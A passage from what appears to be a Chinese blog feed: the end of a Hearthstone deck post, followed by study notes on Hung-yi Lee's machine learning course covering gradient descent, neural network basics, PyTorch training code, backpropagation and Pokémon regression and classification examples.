
    jpg

    ​ 开包开着开着给了我张弑君,于是也顺便组了套弑君贼。

    jpg

    ​ 根据自己对卡组的理解对异灵术老师的快乐术进行了魔改,也就打打宇宙术了,上分还是算了。

    jpg

    ​ 从某个大神抄来的库卡隆战,卖点是艇长-巴罗夫领主/沸血蛮兵抗衡黑眼术,找机会复制库卡隆精英卫士偷鸡,如果组件被破坏还可以尝试复制血骨傀儡。

    jpg

    ​ 从库卡隆战的防守思路演变而来的 ETC 战,这套更偏向于防守一些。冷门又强力的卡组我还是蛮喜欢的。

    12. 贫瘠之地的锤炼

    jpg

    ​ 凭着之前攒的卡组的一套残片术。由于不想合连环灾难索性抛弃了 4 费曲线使用了卡扎库斯,但是卡扎库斯的效果好像并不是很好。

    jpg

​ 用剩余的尘合了一套魔块术,以针对狂野环境的厕所骑,效果拔群。在用这套卡组首日便上了传说后没几天,就觉得该收心去考研,于是弃坑了。现在想想确实是个正确的决定:炉石确实是个精彩的游戏,但是我本科期间在这款游戏上花了太多的时间。

    ]]>
    @@ -8529,7 +8529,7 @@ /posts/ML-%E6%9D%8E%E5%AE%8F%E6%AF%85-Lecture%201-Introduction%20of%20Deep%20Learning/ - Preparation

    ##【機器學習 2021】預測本頻道觀看人數 -上- - 機器學習基本概念簡介

    什么是机器学习

    png

    Machine Learning ≈ Look for Function 让机器具备找函数的能力

    • Speech Recognition 语音辨识
    • Image Recognition 图像识别
    • Playing Go 下围棋

    机器学习的各个领域

    png

    • Regression 回归,如接受今日 PM 2.5,气温和臭氧含量作为参数,以明日 PM2.5 作为输出
      • The function outputs a scalar. 该函数输出一个标量。
    • Classification 分类,如判断收到的邮件是否为垃圾邮件。
  • Given options (classes), the function outputs the correct one. 给出选项(类),该函数输出正确的选项。

    png

    ​ 如下围棋就是一个分类问题,将围棋的每个坐标当作一个类来看。

    png

    回归分类只是机器学习中的一小部分,还有结构化学习 Structured Learning,输入和输出都是具有结构化的对象(数列、列表、树、边界框等)。

    举例:预测本频道观看人数

    png

    ​ 找到一个函数用于描述某天本频道观看人数。

    1.Function with Unknown Parameters

    png

    ​ 我们假设某天本频道观看人数 $y$ 与其前一天本频道观看人数 $x_1$ 有关,且满足关系式 $y = b + wx_1$。

    ​ 参数 $w$ 和 $b$ 都是未知的,要从数据中学习得出。

    2.Define Loss from Training Data

    png

    损失函数 $L(b, w)$ 是一个含有参数 $w$ 和 $b$ 的函数,用于衡量参数 $w$ 和 $b$ 的取值有多好。

    $$Loss: L = \frac{1}{N}\sum_ne_n$$

    $y$ 表示预测值,$\hat y$ 表示实际值,$e$ 表示误差

    • 如果 $e=|y-\hat y|$,则 $L$ 为平均绝对值误差(MAE)
    • 如果 $e=(y-\hat y)^2$,则 $L$ 为均方误差(MSE)

    如果 $y$ 和 $\hat y$ 都是概率分布,则用交叉熵损失函数(Cross-entropy)

    3.Optimization

$$w^*,b^*=\arg\min_{w, b}L$$

    ​ 找到使 $L$ 值最小时 $w$ 和 $b$ 的取值。

    png

    先考虑只有参数 $w$ 的情况:

$$w^*=\arg\min_w L$$

    使用梯度下降方法:

• (随机)挑选一个初始值 $w^0$

    • 计算 $L$ 对 $w$ 的导数 $\frac{\partial L}{\partial w}|_{w=w^0}$

    • 迭代更新 $w$,$w^1\leftarrow w^0 - {\color{Red} \eta } \frac{\partial L}{\partial w}|_{w=w^0}$

  • 其中 ${\color{Red} \eta }$ 被称为学习率(learning rate),这是由用户自行设定的。
    • 由用户自行设定的参数被称为超参数(hyperparameters)。

    ​ 梯度下降方法只能找到 $L$ 的极小值(local minima)而不是最小值(global minima),但这不是梯度下降方法最大的问题。

    ​ 为什么不采用暴力搜索的方法查找最小值?如果参数过多,暴力搜索的方法就无法实现了,只能采用梯度下降方法。

    png

    ​ 对于多个参数 $w$ 和 $b$,原理相同。

    ​ 至于求导,可以由深度学习框架自行解决。

    ​ 何时停止迭代?当算得的梯度为 0 或者人为终止迭代。

    $$\bigtriangledown L = \begin{bmatrix}
    \frac{\partial L}{\partial w} \
    \frac{\partial L}{\partial b}
    \end{bmatrix}_{\mathrm{gradient}}$$

    因而得名梯度下降。
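To make the update rule concrete, here is a minimal plain-Python sketch of gradient descent for the model $y = b + wx_1$ (my own illustration, with made-up data and hyperparameter values, not code from the lecture):

xs = [2.4, 2.1, 2.9, 3.3]   # previous day's views (thousands), invented numbers
ys = [2.3, 2.7, 3.1, 3.0]   # next day's views (thousands), invented numbers
w, b, eta = 0.0, 0.0, 0.01  # initial parameters and learning rate
for step in range(1000):
    # dL/dw and dL/db for the MSE loss L = (1/N) * sum_n (y_n - (b + w*x_n))^2
    grad_w = sum(-2 * x * (y - (b + w * x)) for x, y in zip(xs, ys)) / len(xs)
    grad_b = sum(-2 * (y - (b + w * x)) for x, y in zip(xs, ys)) / len(xs)
    w -= eta * grad_w           # w <- w - eta * dL/dw
    b -= eta * grad_b           # b <- b - eta * dL/db
print(w, b)                     # parameters after 1000 updates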

As the number of iterations grows, the value of $L$ gradually decreases.

In the slide's diagram, red marks large values of $L$ and blue marks small values.

Summary

In the final trained model, $w^*=0.97$ and $b^*=0.1\mathrm{k}$. On the training set (daily view counts for 2017-2020): $L(w^*, b^*)=0.48\mathrm{k}$.

On data not used during training (daily view counts for 2021), $L'=0.58\mathrm{k}$.

The trained model simply assumes that today's view count depends on yesterday's. The actual data, however, show a clear periodicity: views drop on weekends, for example.

Adjusting the model to $y=b+\sum^7_{j=1}w_jx_j$ makes the prediction depend on the whole previous week; both $L$ and $L'$ drop.

With $y=b+\sum^{28}_{j=1}w_jx_j$, $L$ and $L'$ drop further.

With $y=b+\sum^{56}_{j=1}w_jx_j$, $L$ and $L'$ stop improving: looking even further back no longer helps the model.

## [Machine Learning 2021] Predicting This Channel's View Count (Part 2): Basic Concepts of Deep Learning

1. Function with Unknown Parameters

Perhaps linear models are too simple and we need something more expressive. If the true relationship looks like the red piecewise-linear curve on the slide, then no matter how you train a linear model it will never fit reality well.

Model bias usually comes from a model that is too simple; further training cannot find better parameters to push $L$ down.

The red piecewise-linear curve can be written as a constant plus a sum of hard-sigmoid functions: $y=b+\sum_ic_i\,\mathrm{sigmoid}(b_i+w_ix_1)$.

Any piecewise-linear curve can be represented in this form, as long as there are enough hard-sigmoid functions.

How many sigmoid functions? Set by the user; this too is a hyperparameter.

A continuous curve is approximated by a piecewise-linear one; a good approximation needs enough pieces.

The hard sigmoid is usually approximated by the soft sigmoid (commonly just called the sigmoid function).

Sigmoid function: $y=c\frac{1}{1+e^{-(b+wx_1)}}=c\,\mathrm{sigmoid}(b+wx_1)$

• Changing $w$ changes the slope of the sigmoid

• Changing $b$ shifts the sigmoid

• Changing $c$ changes the height of the sigmoid

This gives a new regression model with more features: $y=b+\sum_ic_i\,\mathrm{sigmoid}\left(b_i+\sum_jw_{ij}x_j\right)$

• $i$ indexes the sigmoid functions
• $j$ indexes the features
• $w_{ij}$ is the weight of feature $x_j$ in the $i$-th sigmoid

Passing the sums through the activation functions and adding everything up yields the final regression output $y$.

The whole expression can be written compactly with matrix-vector products.

Flatten all parameters into a single vector $\theta$.
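As a sanity check on the formula above, here is a small NumPy sketch of the model $y=b+\sum_ic_i\,\mathrm{sigmoid}(b_i+\sum_jw_{ij}x_j)$ in its vectorized form (my own illustration; the shapes and random values are arbitrary assumptions):

import numpy as np

rng = np.random.default_rng(0)
W = rng.normal(size=(4, 3))   # w_ij: weight of feature j in sigmoid unit i (4 units, 3 features)
b_vec = rng.normal(size=4)    # the b_i
c = rng.normal(size=4)        # the c_i
b = 0.5                       # the global constant b

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def model(x):
    # y = b + sum_i c_i * sigmoid(b_i + sum_j w_ij * x_j), written as vector products
    return b + c @ sigmoid(b_vec + W @ x)

print(model(np.array([0.2, -1.0, 0.7])))   # scalar prediction for one input vector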

2. Define Loss from Training Data

The loss $L$ is defined as before, but since there are many more parameters now, it is written $L(\theta)$.

3. Optimization

The problem becomes $\theta^*=\arg\min_\theta L$; the method is the same as before, only with more parameters.

Write $\mathbf{g}$ as shorthand for the vector of derivatives of $L$ with respect to all parameters.

Because there are so many parameters, the dataset is split into batches for updating $\theta$. One full pass over the whole dataset is called an epoch.

Examples:

• With 10,000 examples and a batch size of 10, one epoch performs 1,000 parameter updates.
• With 1,000 examples and a batch size of 100, one epoch performs 10 parameter updates.

The batch size is also a hyperparameter.

Two ReLUs added together can also replace the sigmoid as an approximation of the hard sigmoid.
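A quick numerical illustration of that claim (my own sketch, not lecture code): a hard sigmoid of height c is exactly the difference of two shifted ReLUs.

import numpy as np

def relu(z):
    return np.maximum(0.0, z)

def hard_sigmoid(x, c=1.0, w=2.0, b=0.0):
    # relu(w*x + b) rises without bound; subtracting relu(w*x + b - c)
    # flattens the ramp once it reaches height c.
    return relu(w * x + b) - relu(w * x + b - c)

xs = np.linspace(-2.0, 2.0, 9)
print(hard_sigmoid(xs))   # 0 on the left, a linear ramp in the middle, constant c on the right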

Such functions are called activation functions; in general ReLU works somewhat better than sigmoid.

Using more ReLUs to approximate the target regression curve, $L$ drops as the number of ReLUs grows.

This computation can also be applied several times in succession, forming a deep neural network.

Prediction results of a 3-layer network: since the model knows nothing about Chinese New Year, its error is large around the holiday.

Giving unified names to everything encountered so far.

As the field developed, networks grew deeper and deeper and accuracy kept improving.

Residual Net is not a plain fully connected network; it uses a special structure, without which it would very likely overfit.

More layers is not always better: too many layers can lead to overfitting.

Class Material

## [Machine Learning 2022] Semester opening: weekly updates again

A quick tour of the course

This course focuses on Deep Learning.

In machine learning, the input can be a vector, a matrix (e.g. an image) or a sequence (e.g. speech, text); the output can be a scalar (regression), a class (classification), text, an image and so on.

Ways to teach a machine

• HW1: COVID-19 Case Prediction
  • vector in, scalar out
• HW2: Phoneme Classification
  • vector in, class out
• HW3: Image Classification
  • matrix in, class out
• HW4: Speaker Classification
  • sequence in, class out
• HW5: Machine Translation
  • sequence in, text out
• HW6: anime face generation

Lectures 1-5: supervised learning

Lectures 1-5 cover supervised learning. Taking "given a picture, classify it as Pokémon or Digimon" as the example, the training set needs matching labels.

Lecture 7: self-supervised learning

To apply supervised learning in deep networks we need enough labeled data, but manual labeling is time-consuming and expensive, and in special domains such as medicine even collecting enough data is a challenge in itself. The current bottleneck of supervised learning is therefore label generation and annotation.

Self-supervised learning is a way of turning an unsupervised problem into a supervised one.

A pre-trained model (foundation model) is to downstream tasks what an operating system is to applications.

AI researchers collectively call such large models Foundation Models.

Lecture 6: GAN

GAN: the training inputs $x$ and outputs $y$ no longer have to appear as matched pairs.

Common application areas:

Lecture 12: reinforcement learning

When even humans cannot say what the optimal answer is: reinforcement learning.

Advanced topics: beyond accuracy

Lecture 8: anomaly detection

Besides recognizing whether an image shows a Pokémon or a Digimon, the machine should also recognize anomalous images and answer "I don't know".

Lecture 9: Explainable AI

The machine should know not only the what but also the why.

For example, while classifying an image as Pokémon or Digimon, mark the main evidence used for the decision; it turns out the main evidence does not lie on the creature itself?

The cause, finally uncovered: all Pokémon images were PNG files while most Digimon images were JPEGs, and the machine was telling Pokémon and Digimon apart by background color.

Lecture 10: Model Attack

Adding a certain amount of noise to an image can produce a completely different classification.

Attack and defense

• Attack: inject noise to corrupt the prediction
• Defense: keep noise from corrupting the prediction

Lecture 11: domain adaptation

A model trained on black-and-white images tests well on black-and-white images but poorly on color images.

Lecture 13: network compression

Deploying ML models in resource-constrained environments.

Lecture 14: Life-long Learning

The goal of life-long learning: one machine that can keep solving all kinds of problems.

Learning to learn

Lecture 15: meta learning

Few-shot learning is usually achieved through meta learning: let the machine find a learning algorithm on its own.

ML 2022 PyTorch Tutorial 1

Installing PyTorch

The official way is to install the environment from the PyTorch homepage, but the download is painfully slow from mainland China…

After much fiddling, offline installation turned out to be the better route.

From the mirror https://download.pytorch.org/whl/torch_stable.html download matching versions of torch and torchvision.

I downloaded cu117/torch-1.13.1%2Bcu117-cp39-cp39-win_amd64.whl and cu117/torchvision-0.14.1%2Bcu117-cp39-cp39-win_amd64.whl.

Open cmd in the download directory and install with pip install torch-1.13.1+cu117-cp39-cp39-win_amd64.whl and pip install torchvision-0.14.1+cu117-cp39-cp39-win_amd64.whl.

Verify in Python:

import torch

print(torch.__version__)
print(torch.cuda.is_available())  # whether the CUDA GPU is usable
1.13.1+cu117
True

Training Neural Networks

Steps for training a neural network:

• Define the network architecture, the loss function and the optimization algorithm
• Train

Training & Testing Neural Networks

Training uses the training set and the validation set; testing uses the test set.

Training & Testing Neural Networks - in PyTorch

Step 1. torch.utils.data.Dataset & torch.utils.data.DataLoader

Dataset & DataLoader

Dataset: stores the data samples $x$ and the expected values $y$

DataLoader: groups data in batches and enables multiprocessing

dataset = MyDataset(file)
dataloader = DataLoader(dataset, batch_size, shuffle=True)

Reference (in Chinese): 机器学习,深度学习模型训练阶段的 Shuffle 重要么?为什么? (CSDN blog)

• For training and validation, shuffle the data: shuffle=True
• For testing, do not shuffle: shuffle=False

The following code loads the dataset in batches of 5 samples each:

dataset = MyDataset(file)
dataloader = DataLoader(dataset, batch_size=5, shuffle=False)

Design a MyDataset class to manage the dataset:

from torch.utils.data import Dataset, DataLoader


class MyDataset(Dataset):
    def __init__(self, file):
        """Read the data and initialize."""
        self.data = ...

    def __getitem__(self, index):
        """Return one sample."""
        return self.data[index]

    def __len__(self):
        """Return the size of the dataset."""
        return len(self.data)
Tensors

Tensors in PyTorch are high-dimensional arrays, the counterpart of NumPy's array.

dim in PyTorch == axis in NumPy

Creating a tensor

• Directly from data (a list or a numpy.ndarray):
x = torch.tensor([[1, -1], [-1, 1]])
x = torch.from_numpy(np.array([[1, -1], [-1, 1]]))
• From a shape, filled with 0s or 1s:
x = torch.zeros([2, 2])
x = torch.ones([1, 2, 5])

Common operators

• Addition: z = x + y
• Subtraction: z = x - y
• Power: y = x.pow(2)
• Sum: y = x.sum()
• Mean: y = x.mean()
• Transpose: x = x.transpose(0, 1)
• Squeeze: remove a dimension of size 1
• Unsqueeze: add a dimension
• Cat: concatenate tensors
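The slides illustrate Squeeze, Unsqueeze and Cat with shape diagrams; the following sketch (mine, with arbitrary example shapes) shows the same shape bookkeeping in code:

import torch

x = torch.zeros([1, 2, 3])
print(x.squeeze(0).shape)       # torch.Size([2, 3]): dim 0 (size 1) is removed
print(x.unsqueeze(1).shape)     # torch.Size([1, 1, 2, 3]): a new dim is inserted at index 1

a = torch.zeros([2, 1, 3])
b = torch.zeros([2, 2, 3])
print(torch.cat([a, b], dim=1).shape)   # torch.Size([2, 3, 3]): concatenated along dim 1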

PyTorch vs. NumPy

Data types:

Data type | dtype | tensor
32-bit floating point | torch.float | torch.FloatTensor
64-bit integer (signed) | torch.long | torch.LongTensor

API correspondence:

PyTorch | NumPy
x.shape | x.shape
x.dtype | x.dtype
x.reshape / x.view | x.reshape
x.squeeze() | x.squeeze()
x.unsqueeze(1) | np.expand_dims(x, 1)
Device

Choose whether tensors are computed on the CPU or on CUDA.

CPU

x = x.to('cpu')

GPU

x = x.to('cuda')

Computing gradients

Define $x$ and declare up front that gradients are needed: requires_grad=True

$$x=\begin{bmatrix}1 & 0 \\ -1 & 1\end{bmatrix}$$

x = torch.tensor([[1., 0.], [-1., 1.]], requires_grad=True)

$$z=\sum_i\sum_j x^2_{i,j}$$

z = x.pow(2).sum()

Differentiate:

$$\frac{\partial z}{\partial x_{i,j}}=2x_{i,j}$$

z.backward()

Read off the gradient of $x$:

$$\frac{\partial z}{\partial x}=\begin{bmatrix}2&0\\-2&2\end{bmatrix}$$

x.grad
tensor([[ 2., 0.], [-2., 2.]])

Step 2. torch.nn.Module

• Fully connected layer:
layer = torch.nn.Linear(32, 64)
• Activation functions:
nn.Sigmoid()
nn.ReLU()

Put the network definition inside a MyModel class:

import torch.nn as nn


class MyModel(nn.Module):
    def __init__(self):
        """Initialize your model and define its layers."""
        super(MyModel, self).__init__()
        self.net = nn.Sequential(
            nn.Linear(10, 32),
            nn.Sigmoid(),
            nn.Linear(32, 1)
        )

    def forward(self, x):
        """Compute the output of your NN."""
        return self.net(x)

nn.Sequential is optional; the code below behaves the same way:

import torch.nn as nn


class MyModel(nn.Module):
    def __init__(self):
        super(MyModel, self).__init__()
        self.layer1 = nn.Linear(10, 32)
        self.layer2 = nn.Sigmoid()   # no trailing comma here, or the layer becomes a tuple
        self.layer3 = nn.Linear(32, 1)

    def forward(self, x):
        out = self.layer1(x)
        out = self.layer2(out)
        out = self.layer3(out)
        return out

Step 3. torch.nn.MSELoss, torch.nn.CrossEntropyLoss, etc.

Define the loss function

• MSE:
criterion = nn.MSELoss()
• Cross-entropy:
criterion = nn.CrossEntropyLoss()
• Compute the loss from prediction and target:
loss = criterion(model_output, expected_value)

Step 4. torch.optim

Pick an algorithm that reduces the loss, e.g. Stochastic Gradient Descent (SGD):

torch.optim.SGD(model.parameters(), lr, momentum=0)

Step 5. Entire Procedure

Neural Network Training Setup

Full pipeline: load data - split data - define model - define loss - define optimizer

dataset = MyDataset(file)
tr_set = DataLoader(dataset, 16, shuffle=True)
model = MyModel().to(device)
criterion = nn.MSELoss()
optimizer = torch.optim.SGD(model.parameters(), 0.1)

Neural Network Training Loop

Training:

for epoch in range(n_epochs):              # one epoch per iteration
    model.train()                          # set the model to train mode
    for x, y in tr_set:                    # read x, y from the dataloader
        optimizer.zero_grad()              # reset gradients to 0
        x, y = x.to(device), y.to(device)  # move data to the device (CPU/CUDA)
        pred = model(x)                    # forward pass (compute outputs)
        loss = criterion(pred, y)          # compute the loss
        loss.backward()                    # compute gradients (backpropagation)
        optimizer.step()                   # update the parameters

Neural Network Validation Loop

Continuing inside the epoch loop above:

model.eval()                               # set the model to evaluation mode
total_loss = 0                             # initialize the accumulated loss
for x, y in dv_set:                        # read x, y from the dataloader
    x, y = x.to(device), y.to(device)      # move data to the device (CPU/CUDA)
    with torch.no_grad():                  # disable gradient computation
        pred = model(x)                    # compute the predictions
        loss = criterion(pred, y)          # compute the loss
    total_loss += loss.cpu().item() * len(x)   # accumulate the loss
avg_loss = total_loss / len(dv_set.dataset)    # average loss over the whole set

Neural Network Testing Loop

model.eval()                               # set the model to evaluation mode
preds = []                                 # list that collects the predictions
for x in tt_set:                           # read x from the dataloader
    x = x.to(device)                       # move data to the device (CPU/CUDA)
    with torch.no_grad():                  # disable gradient computation
        pred = model(x)                    # compute the predictions
        preds.append(pred.cpu())           # store the predictions

Notice - model.eval(), torch.no_grad()

• model.eval() changes the behavior of some layers, e.g. dropout and batch normalization.
• with torch.no_grad() keeps computations out of the gradient graph; it is usually used to prevent accidental training on validation/test data.

Saving / loading a trained model

• Save:
torch.save(model.state_dict(), path)
• Load:
ckpt = torch.load(path)        # path of the saved checkpoint
model.load_state_dict(ckpt)    # restore the parameters from the checkpoint

More About PyTorch

• torchaudio
  • speech/audio processing
• torchtext
  • natural language processing
• torchvision
  • computer vision
• skorch
  • scikit-learn + PyTorch
• Useful GitHub repositories using PyTorch
  • Huggingface Transformers (transformer models: BERT, GPT, …)
  • Fairseq (sequence modeling for NLP & speech)
  • ESPnet (speech recognition, translation, synthesis, …)
  • Most implementations of recent deep learning papers

Extra Material

Introduction of Deep Learning

Deep Learning is used more and more often.

A history of Deep Learning:

• 1958: Perceptron (linear model)
• 1969: The perceptron has clear limitations, e.g. it cannot solve XOR
• 1980s: Multi-layer perceptron
  • Not significantly different from today's DNNs
• 1986: Backpropagation
  • Usually more than 3 hidden layers did not help
• 1989: 1 hidden layer is "good enough", so why go deep?
• 2006: RBM initialization (breakthrough): 受限玻尔兹曼机(RBM)学习 - 知乎 (zhihu.com)
• 2009: GPUs accelerate network training
• 2011: Starts to become popular in speech recognition
• 2012: Wins the ILSVRC image competition

The steps of Deep Learning are similar to those of traditional machine learning:

• Step 1: define a set of functions; in Deep Learning this means designing the network structure
• Step 2: goodness of function
• Step 3: pick the best function

The forward pass of a neural network is just a sequence of matrix operations, which is why it runs faster on a GPU than on a CPU.

The hidden layers of the network play the role of a feature extractor, replacing the feature engineering of traditional machine learning.

For a classification problem, the output layer applies a Softmax and outputs the class with the highest value.

For handwritten digit recognition, the output is a vector, and the largest entry gives the predicted class.

The hidden layers then amount to a set of candidate digit-recognition functions; you design a good network structure so that a good function can be fit within it.

Q: How many layers does the network need? How many neurons per layer?

A: Trial and error plus the developer's intuition.

Q: Can we let the machine design the network automatically?

A: E.g. [Evolutionary Artificial Neural Networks (researchgate.net)](https://www.researchgate.net/publication/2861461_Evolutionary_Artificial_Neural_Networks#:~:text=Evolutionary artificial neural networks (EANNs) refer to a,(GAs)%2C evolutionary programming (EP)%2C or other evolutionary algorithms.), but such methods are not yet that general.

Q: Other network shapes?

A: E.g. convolutional neural networks.

Define the loss: since $y$ and $\hat y$ are both probability distributions, use the cross-entropy

$$C(y,\hat y)=-\sum^{10}_{i=1}\hat{y_i}\ln y_i$$

The total loss is $L=\sum^N_{n=1}C^n$; the goal is to tune the hidden-layer parameters so that $L$ is minimized.

How to search for the minimum of $L$: gradient descent.

Even AlphaGo uses gradient descent.

Backpropagation: an efficient way to compute all the derivatives. Working them out by hand is tedious; in practice, use an existing library.

In theory, with enough neurons, any function can be approximated.

Other resources:

Backpropagation

Backpropagation is an efficient algorithm for computing the gradient inside gradient descent.

The chain rule

• Case 1: $y=g(x),\ z=h(y)$
  • $\Delta x \rightarrow \Delta y \rightarrow \Delta z$
  • the derivative of $z$ with respect to $x$: $\frac{dz}{dx}=\frac{dz}{dy}\frac{dy}{dx}$
• Case 2: $x=g(s),\ y=h(s),\ z=k(x,y)$
  • the derivative of $z$ with respect to $s$: $\frac{dz}{ds}=\frac{\partial z}{\partial x}\frac{dx}{ds}+\frac{\partial z}{\partial y}\frac{dy}{ds}$

For gradient descent we need the derivative of $L$ with respect to every weight $w$:

$$L(\theta)=\sum^N_{n=1}C^n(\theta)\ \rightarrow\ \frac{\partial L(\theta)}{\partial w}=\sum^N_{n=1}\frac{\partial C^n(\theta)}{\partial w}$$

So computing $\frac{\partial L(\theta)}{\partial w}$ reduces to computing $\frac{\partial C}{\partial w}$.

By the chain rule, $\frac{\partial C}{\partial w}=\frac{\partial z}{\partial w}\frac{\partial C}{\partial z}$, where $z$ is the neuron's weighted input.

The forward pass computes $\frac{\partial z}{\partial w}$;

the backward pass computes $\frac{\partial C}{\partial z}$.

Forward pass: as in the diagram, $z=x_1w_1+x_2w_2+b$, so $\frac{\partial z}{\partial w_1}=x_1$ and $\frac{\partial z}{\partial w_2}=x_2$: the derivative is simply the value flowing into the weight.

Backward pass: by the chain rule, $\frac{\partial C}{\partial z}=\frac{\partial a}{\partial z}\frac{\partial C}{\partial a}$, with $\frac{\partial C}{\partial a}=\frac{\partial z'}{\partial a}\frac{\partial C}{\partial z'}+\frac{\partial z''}{\partial a}\frac{\partial C}{\partial z''}$

The derivatives of the next-layer inputs $z'$, $z''$ with respect to the activation $a$ are easy (they are just the weights $w$); the hard part is the derivative of the cost $C$ with respect to $z$.

It is computed from the data behind the neuron: $\frac{\partial C}{\partial z}=\sigma'(z)\left[w_3\frac{\partial C}{\partial z'}+w_4\frac{\partial C}{\partial z''}\right]$

Here $\sigma'(z)$ is the derivative of the activation function, and at this point it is a constant, since $z$ was already obtained in the forward pass.

For the sigmoid $f(x)=\frac{1}{1+e^{-x}}$, the derivative is $f'(x)=f(x)\left[1-f(x)\right]$

If the next layer is the output layer, $\frac{\partial C}{\partial z'}$ can be computed directly from the output values.

If not, compute the next layer's $\frac{\partial C}{\partial z}$ recursively until the output layer is reached.

To summarize: the forward pass gives $\frac{\partial z}{\partial w}=a$, the backward pass gives $\frac{\partial C}{\partial z}$, and their product is the desired $\frac{\partial C}{\partial w}$.
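As a numeric check of this summary, here is a tiny hand-rolled example (my own, not from the lecture): one sigmoid neuron feeding one linear output with a squared-error cost, comparing the backpropagated gradient against a finite-difference estimate.

import math

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

x, w1, b1 = 0.5, 0.8, 0.1    # input and hidden-neuron parameters (arbitrary values)
w2, b2 = -1.2, 0.3           # output-layer parameters
y_hat = 1.0                  # target

# Forward pass: store z and a, because the backward pass reuses them.
z = w1 * x + b1              # dz/dw1 = x
a = sigmoid(z)
y = w2 * a + b2
C = 0.5 * (y - y_hat) ** 2

# Backward pass: dC/dz = sigma'(z) * w2 * dC/dy, with sigma'(z) = a * (1 - a).
dC_dy = y - y_hat
dC_dz = a * (1 - a) * w2 * dC_dy
dC_dw1 = x * dC_dz           # dC/dw1 = (dz/dw1) * (dC/dz)

# Compare with a finite-difference estimate of dC/dw1.
eps = 1e-6
C_eps = 0.5 * (w2 * sigmoid((w1 + eps) * x + b1) + b2 - y_hat) ** 2
print(dC_dw1, (C_eps - C) / eps)   # the two numbers should agree to several decimals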

Predicting Pokémon CP

A case study of a regression problem.

Regression can:

• Predict the stock market

  • input the price history, output tomorrow's Dow Jones index
• Drive a car

  • input the surroundings, output the steering
• Recommend products

  • input a user and a product, output the probability of purchase

The course's case study:

given a Pokémon's combat power $x_{cp}$, type $x_s$, HP $x_{hp}$, weight $x_w$ and height $x_h$, predict its CP value $y$ after evolution.

Step 1: Model

Assume a linear model in which the evolved CP depends only on the current CP: $y=b+wx_{cp}$.

Step 2: Goodness of Function

The training set consists of data from 10 Pokémon, written $(x^1,\hat y^1), (x^2, \hat y^2)\dots(x^{10}, \hat y^{10})$.

Define the loss as the estimation error: $\mathrm{L}(f)=\mathrm{L}(w, b)=\sum^{10}_{n=1}\left(\hat y^n - (b+w\cdot x^n_{cp})\right)^2$

Step 3: Gradient Descent

Use gradient descent to solve $w^*=\arg\min_wL(w)$

Gradient descent only finds a local minimum and cannot guarantee the global one, so different initializations may give different results.

For a linear model this problem does not arise: every local minimum is the global minimum.

The resulting model is $b=-188.4, w=2.7$, with $L=35.0$ on the training set and $L=31.9$ on the test set.

Switching to a more complex model lowers $L$ further.

Model Selection

The higher the degree of the chosen model, the smaller $L$ on the training set, but on the test set $L$ may rise instead of falling. This phenomenon is called overfitting.

It is like learning to drive at a driving school: you discover that watching certain markers makes you drive better there, but it does not make you better on real roads.

Consider other factors that influence $y$, such as the Pokémon's species: apply a different linear model per species.

Introducing one-hot encoding, the model becomes $y=b+\sum w_ix_i$.

This again lowers $L$ effectively.

When the model becomes too complex, overfitting reappears.

Modify the expression for $L$: $L=\sum_n\left(\hat y^n-\left(b+\sum w_ix_i\right)\right)^2+{\color{Red}\lambda \sum(w_i)^2}$, so that a function that is not smooth enough pays a penalty.

$\lambda$ is a hyperparameter; neither too large nor too small is good. We prefer smooth functions, but don't be too smooth.
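As a side note (my own addition, not from the lecture): for a linear model the regularized loss above has a closed-form minimizer, $w = (X^TX+\lambda I)^{-1}X^Ty$, known as ridge regression, which makes the shrinking effect of $\lambda$ easy to see:

import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(10, 3))                    # 10 samples, 3 made-up features
y = X @ np.array([2.0, -1.0, 0.5]) + 0.1 * rng.normal(size=10)

for lam in (0.0, 1.0, 100.0):
    w = np.linalg.solve(X.T @ X + lam * np.eye(3), X.T @ y)
    print(lam, w)                               # larger lambda shrinks the weights toward 0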

Pokemon classification

Classification: Probabilistic Generative Model

A classification problem: take an input $x$ and output its class.

Examples:

• Credit Scoring
  • Input: income, savings, profession, age, past financial history…
  • Output: accept or refuse the loan
• Medical Diagnosis
  • Input: current symptoms, age, gender, past medical history…
  • Output: which kind of disease
• Handwritten character recognition
  • Input: the handwritten image
  • Output: which character was written

The course case study: from a Pokémon's base stats (HP, attack, defense, sp. attack, sp. defense, speed), predict the Pokémon's type.

Forcing classification into regression: at training time, treat class 1 as target 1 and class 2 as target -1.

At test time, the closer the output is to 1 the more it looks like class 1; the closer to -1, the more like class 2.

But regression will shift the fitted line to accommodate points that are "too correct", making the classification worse; with more classes the effect is worse still.

The ideal alternative:

• Model
  • inside $f(x)$: if $g(x)>0$, output class 1, otherwise class 2
• Loss
  • $L(f)=\sum_n\delta(f(x^n)\ne \hat y^n)$: the number of misclassified examples
• A way to minimize $L$
  • examples: perceptron, SVM

Using a probabilistic model instead:

$$P(x)=P(x|C_1)P(C_1)+P(x|C_2)P(C_2)$$

Take the Pokémon with ID $< 400$ as the training set and the rest as the test set.

Among the Pokémon with ID $< 400$ there are $79$ Water types and $61$ Normal types, so $P(C_1)=79/(79+61)=0.56$ and $P(C_2)=61/(79+61)=0.44$

Assume first that a Pokémon's type depends only on its defense and sp. defense.

Psyduck, for example, has defense 48 and sp. defense 50, so its feature vector is $\begin{bmatrix} 48 \\ 50 \end{bmatrix}$.

Assume the defense and sp. defense of Water Pokémon follow a normal distribution.

The normal (Gaussian) density:

$$f_{\mu,\Sigma}(x)=\frac{1}{(2\pi)^{D/2}}\frac{1}{|\Sigma|^{1/2}}\exp\left\{-\frac{1}{2}(x-\mu)^T\Sigma^{-1}(x-\mu)\right\}$$

• Input: vector $x$
• Output:
  • the probability density of sampling $x$
  • The shape of the function is determined by the mean $\mu$ and the covariance matrix $\Sigma$.

Assume these points were sampled from a Gaussian; find the Gaussian behind them.

Maximum likelihood estimation

A Gaussian with any mean $\mu$ and covariance matrix $\Sigma$ could have generated these points; the likelihood of $\mu$ and $\Sigma$ given the samples $x^1,x^2,x^3,\dots,x^{79}$ is

$$L(\mu,\Sigma)=f_{\mu,\Sigma}(x^1)f_{\mu,\Sigma}(x^2)f_{\mu,\Sigma}(x^3)\cdots f_{\mu,\Sigma}(x^{79})$$

To maximize $L$, take $\mu$ to be the sample mean and $\Sigma$ the sample covariance.

Compute $\mu$ and $\Sigma$ for the samples of both types.

With every quantity in the formula computable, we can classify:

when $P(C_1|x)>0.5$, assign sample $x$ to class 1.
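Putting the whole generative recipe together in NumPy (a sketch of mine with made-up stand-in data, since the real stat table is not reproduced here):

import numpy as np

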